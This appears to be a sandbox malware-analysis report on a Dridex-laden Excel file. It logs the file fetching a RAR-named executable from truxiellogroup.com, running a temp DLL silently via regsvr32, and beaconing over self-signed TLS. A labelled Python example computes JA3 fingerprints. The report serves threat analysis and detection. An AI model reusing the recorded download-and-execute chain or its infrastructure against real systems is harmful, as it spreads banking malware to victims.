                                                                                                                                      01/12/21-01:45:03.525800TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492835.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:03.525800TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492835.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:04.587567TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928577.220.64.37192.168.2.22

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                      Jan 12, 2021 01:43:53.049535990 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049562931 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.049597979 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049602985 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.049674988 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.055134058 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.241739035 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.241807938 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.241875887 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.241934061 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.241949081 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.241978884 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.241993904 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.241996050 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242058039 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242070913 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242119074 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242130041 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242183924 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242217064 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242260933 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242288113 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242311954 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242350101 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242371082 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242412090 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242417097 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242481947 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.244703054 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.434740067 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.434797049 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.434875011 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.434937000 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.434998989 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435039043 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435059071 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435071945 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435076952 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435120106 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435126066 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435180902 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435185909 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435244083 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435266972 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435322046 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435339928 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435372114 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435390949 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435421944 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435436964 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435471058 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435486078 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435520887 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435535908 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435570955 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435584068 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435621023 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435636997 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435669899 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435687065 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435719013 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435733080 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435769081 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435781956 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435818911 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435836077 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435869932 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435884953 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435936928 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.436577082 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.436649084 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.438278913 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628155947 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628238916 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628303051 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628364086 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628386974 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628424883 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628427982 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628436089 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628487110 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628504992 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628546953 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628562927 CET4916580192.168.2.2268.65.122.35

UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 12, 2021 01:43:52.593648911 CET | 192.168.2.22 | 8.8.8.8 | 0x1c73 | Standard query (0) | truxiellogroup.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 12, 2021 01:43:52.649863005 CET | 8.8.8.8 | 192.168.2.22 | 0x1c73 | No error (0) | truxiellogroup.com | | 68.65.122.35 | A (IP address) | IN (0x0001)
Jan 12, 2021 01:44:32.339005947 CET | 8.8.8.8 | 192.168.2.22 | 0xf75c | No error (0) | cdn.digicertcdn.com | | 104.18.10.39 | A (IP address) | IN (0x0001)
Jan 12, 2021 01:44:32.339005947 CET | 8.8.8.8 | 192.168.2.22 | 0xf75c | No error (0) | cdn.digicertcdn.com | | 104.18.11.39 | A (IP address) | IN (0x0001)
Jan 12, 2021 01:44:32.396790028 CET | 8.8.8.8 | 192.168.2.22 | 0x22f3 | No error (0) | cdn.digicertcdn.com | | 104.18.10.39 | A (IP address) | IN (0x0001)
Jan 12, 2021 01:44:32.396790028 CET | 8.8.8.8 | 192.168.2.22 | 0x22f3 | No error (0) | cdn.digicertcdn.com | | 104.18.11.39 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• truxiellogroup.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 68.65.122.35 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jan 12, 2021 01:43:52.851536036 CET | 0 | OUT | GET /d0l359.rar HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: truxiellogroup.com
Connection: Keep-Alive
Jan 12, 2021 01:43:53.049026966 CET | 2 | IN | HTTP/1.1 200 OK
date: Tue, 12 Jan 2021 00:43:52 GMT
server: Apache
last-modified: Mon, 11 Jan 2021 16:51:11 GMT
accept-ranges: bytes
content-length: 318976
content-type: application/x-rar-compressed
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_!2z`&@@|.0P.text$& `.rdata@*@@.rdata3P,@@.2`0@@.rdata2Fp2@@.data`4@.text4RTP @.rsrc|.0@@.relocP0@BUQVEE(Mh\jtUfh\jtE0M1U-fM^]UQ


                                                                                                                                      HTTPS Packets

All 58 TLS sessions below run between the same two endpoints and carry the same server certificate and the same client fingerprint, so those columns are listed once:

Source IP:77.220.64.37
Source Port:443
Dest IP:192.168.2.22
Subject:CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW
Issuer:CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW
Not Before:Sun Nov 22 23:47:21 CET 2020
Not After:Mon May 24 00:47:21 CEST 2021
JA3 SSL Client Fingerprint:771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0
JA3 SSL Client Digest:eb88d0b3e1961a0562f006e5ce2a0b87

Subject and Issuer are identical, i.e. the certificate is self-signed, and a new session is opened on a fresh client port roughly every two seconds for the whole run.

Timestamp | Dest Port
Jan 12, 2021 01:43:58.265167952 CET | 49166
Jan 12, 2021 01:44:02.725135088 CET | 49171
Jan 12, 2021 01:44:04.816543102 CET | 49175
Jan 12, 2021 01:44:06.899440050 CET | 49179
Jan 12, 2021 01:44:09.036133051 CET | 49183
Jan 12, 2021 01:44:11.132100105 CET | 49187
Jan 12, 2021 01:44:13.200539112 CET | 49191
Jan 12, 2021 01:44:15.545794010 CET | 49195
Jan 12, 2021 01:44:18.668025017 CET | 49199
Jan 12, 2021 01:44:20.782258987 CET | 49203
Jan 12, 2021 01:44:22.895056963 CET | 49207
Jan 12, 2021 01:44:25.002497911 CET | 49211
Jan 12, 2021 01:44:27.108376980 CET | 49215
Jan 12, 2021 01:44:29.176541090 CET | 49219
Jan 12, 2021 01:44:31.256057024 CET | 49223
Jan 12, 2021 01:44:33.550777912 CET | 49229
Jan 12, 2021 01:44:36.422943115 CET | 49233
Jan 12, 2021 01:44:38.558763981 CET | 49237
Jan 12, 2021 01:44:40.655749083 CET | 49241
Jan 12, 2021 01:44:42.762681007 CET | 49245
Jan 12, 2021 01:44:44.949043036 CET | 49249
Jan 12, 2021 01:44:47.099344015 CET | 49253
Jan 12, 2021 01:44:49.200659990 CET | 49257
Jan 12, 2021 01:44:51.536020994 CET | 49261
Jan 12, 2021 01:44:54.069024086 CET | 49265
Jan 12, 2021 01:44:56.163307905 CET | 49269
Jan 12, 2021 01:44:58.286957026 CET | 49273
Jan 12, 2021 01:45:00.440151930 CET | 49277
Jan 12, 2021 01:45:02.480573893 CET | 49281
Jan 12, 2021 01:45:04.587567091 CET | 49285
Jan 12, 2021 01:45:06.703485012 CET | 49289
Jan 12, 2021 01:45:08.957114935 CET | 49293
Jan 12, 2021 01:45:11.386787891 CET | 49297
Jan 12, 2021 01:45:13.495340109 CET | 49301
Jan 12, 2021 01:45:15.603847027 CET | 49305
Jan 12, 2021 01:45:17.696660042 CET | 49309
Jan 12, 2021 01:45:19.800482035 CET | 49313
Jan 12, 2021 01:45:21.920305967 CET | 49317
Jan 12, 2021 01:45:24.042557955 CET | 49321
Jan 12, 2021 01:45:26.353760958 CET | 49325
Jan 12, 2021 01:45:28.783770084 CET | 49329
Jan 12, 2021 01:45:30.906864882 CET | 49333
Jan 12, 2021 01:45:33.014612913 CET | 49337
Jan 12, 2021 01:45:35.135796070 CET | 49341
Jan 12, 2021 01:45:37.273354053 CET | 49345
Jan 12, 2021 01:45:39.394809008 CET | 49349
Jan 12, 2021 01:45:41.501972914 CET | 49353
Jan 12, 2021 01:45:43.740381956 CET | 49357
Jan 12, 2021 01:45:46.466078043 CET | 49362
Jan 12, 2021 01:45:48.672018051 CET | 49366
Jan 12, 2021 01:45:50.877825022 CET | 49370
Jan 12, 2021 01:45:52.970568895 CET | 49374
Jan 12, 2021 01:45:55.058487892 CET | 49378
Jan 12, 2021 01:45:57.165930033 CET | 49382
Jan 12, 2021 01:45:59.286123991 CET | 49386
Jan 12, 2021 01:46:01.400849104 CET | 49390
Jan 12, 2021 01:46:03.514745951 CET | 49394
Jan 12, 2021 01:46:05.621118069 CET | 49398
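The JA3 SSL Client Fingerprint column is built from the client's TLS ClientHello: the decimal protocol version, the cipher suites, the extension types, the supported groups and the EC point formats, each list joined with "-" and the five fields joined with ",", and the JA3 digest is the MD5 of that string. As an added example that is not part of the Joe Sandbox report, the Python below constructs a synthetic ClientHello from the values in the table (the random bytes, empty session id and signature_algorithms contents are made up, since none of them enter the fingerprint), parses it back the way a network sensor would, and reproduces the fingerprint string exactly; hashing that string is what produces the digest column. A second build interleaves GREASE values, which the page's client does not send but modern browsers do, to show that they have to be dropped or the same client would hash differently.

```python
import hashlib
import struct

# Parts of the JA3 SSL Client Fingerprint reported above.
JA3_VERSION = 771                       # ClientHello version 0x0303 (TLS 1.2)
JA3_CIPHERS = [49192, 49191, 49172, 49171, 159, 158, 57, 51, 157, 156, 61, 60, 53, 47,
               49196, 49195, 49188, 49187, 49162, 49161, 106, 64, 56, 50, 10, 19]
JA3_EXTENSIONS = [10, 11, 13, 23, 65281]  # supported_groups, ec_point_formats, signature_algorithms,
                                           # extended_master_secret, renegotiation_info
JA3_GROUPS = [23, 24]                     # secp256r1, secp384r1
JA3_POINT_FORMATS = [0]                   # uncompressed
REPORTED_JA3 = ("771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-"
                "49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0")


def _is_grease(v: int) -> bool:
    """RFC 8701 GREASE values (0x0a0a, 0x1a1a, ..., 0xfafa) are excluded from JA3."""
    return (v & 0x0F0F) == 0x0A0A and (v >> 8) == (v & 0xFF)


def _u16_vector(items, length_bytes: int) -> bytes:
    """TLS vector of uint16 values with a length prefix of the given width."""
    body = b"".join(struct.pack(">H", i) for i in items)
    return len(body).to_bytes(length_bytes, "big") + body


def build_client_hello(grease: bool = False) -> bytes:
    """Synthetic TLS 1.2 ClientHello record carrying the table's parameters.

    Random bytes, session id and signature_algorithms contents are invented here;
    they do not enter JA3. With grease=True a GREASE cipher, extension and group are
    added the way browsers do, to show that they must not change the fingerprint.
    """
    ciphers = ([0x0A0A] if grease else []) + JA3_CIPHERS
    groups = ([0x1A1A] if grease else []) + JA3_GROUPS
    extensions = ([(0x2A2A, b"")] if grease else []) + [
        (10, _u16_vector(groups, 2)),
        (11, bytes([len(JA3_POINT_FORMATS)]) + bytes(JA3_POINT_FORMATS)),
        (13, _u16_vector([0x0401, 0x0501, 0x0201, 0x0403, 0x0503, 0x0203], 2)),
        (23, b""),
        (65281, b"\x00"),
    ]
    ext_bytes = b"".join(struct.pack(">HH", t, len(d)) + d for t, d in extensions)
    body = (struct.pack(">H", JA3_VERSION) + bytes(32) + b"\x00"   # version, random, empty session id
            + _u16_vector(ciphers, 2) + b"\x01\x00"                 # cipher suites, null compression
            + struct.pack(">H", len(ext_bytes)) + ext_bytes)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


def _dash(values) -> str:
    return "-".join(str(v) for v in values)


def ja3_from_client_hello(record: bytes) -> str:
    """Extract the JA3 string from a TLS record that carries a ClientHello."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a handshake record containing a ClientHello")
    p = 9                                                   # past record (5) and handshake (4) headers
    version = struct.unpack_from(">H", record, p)[0]
    p += 2 + 32                                             # client_version, random
    p += 1 + record[p]                                      # session_id
    cs_len = struct.unpack_from(">H", record, p)[0]
    p += 2
    ciphers = [c for (c,) in struct.iter_unpack(">H", record[p:p + cs_len]) if not _is_grease(c)]
    p += cs_len
    p += 1 + record[p]                                      # compression_methods
    exts, groups, formats = [], [], []
    if p < len(record):                                     # the extensions block is optional
        end = p + 2 + struct.unpack_from(">H", record, p)[0]
        p += 2
        while p < end:
            etype, elen = struct.unpack_from(">HH", record, p)
            data = record[p + 4:p + 4 + elen]
            p += 4 + elen
            if _is_grease(etype):
                continue
            exts.append(etype)
            if etype == 10:                                 # supported_groups
                n = struct.unpack_from(">H", data)[0]
                groups = [g for (g,) in struct.iter_unpack(">H", data[2:2 + n]) if not _is_grease(g)]
            elif etype == 11:                               # ec_point_formats
                formats = list(data[1:1 + data[0]])
    return f"{version},{_dash(ciphers)},{_dash(exts)},{_dash(groups)},{_dash(formats)}"


def ja3_digest(ja3: str) -> str:
    """The JA3 hash (the digest column) is the MD5 of the JA3 string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


if __name__ == "__main__":
    ja3 = ja3_from_client_hello(build_client_hello())
    print(ja3, "matches report:", ja3 == REPORTED_JA3)
    print("digest:", ja3_digest(ja3))
```

Because the digest is an unsalted MD5 of a short string, two clients with the same ordered lists collide regardless of anything else in the handshake, and a client that randomises cipher order or sends GREASE in varying positions will produce several digests; the parser above handles GREASE but, like any JA3 implementation, nothing else.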

                                                                                                                                      Code Manipulations

                                                                                                                                      Statistics

                                                                                                                                      Behavior

System Behavior

General

Start time: 01:43:38
Start date: 12/01/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f1d0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 01:43:45
Start date: 12/01/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Imagebase: 0xffcb0000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 01:43:46
Start date: 12/01/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Imagebase: 0xc80000
File size: 14848 bytes
MD5 hash: 432BE6CF7311062633459EEF6B242FB5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 01:44:04
Start date: 12/01/2021
Path: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
Wow64 process (32bit): false
Commandline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
Imagebase: 0x13fa10000
File size: 995024 bytes
MD5 hash: 45A078B2967E0797360A2D4434C41DB4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 01:44:04
Start date: 12/01/2021
Path: C:\Windows\System32\DWWIN.EXE
Wow64 process (32bit): false
Commandline: C:\Windows\system32\dwwin.exe -x -s 1840
Imagebase: 0xffeb0000
File size: 152576 bytes
MD5 hash: 25247E3C4E7A7A73BAEEA6C0008952B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Disassembly

Code Analysis
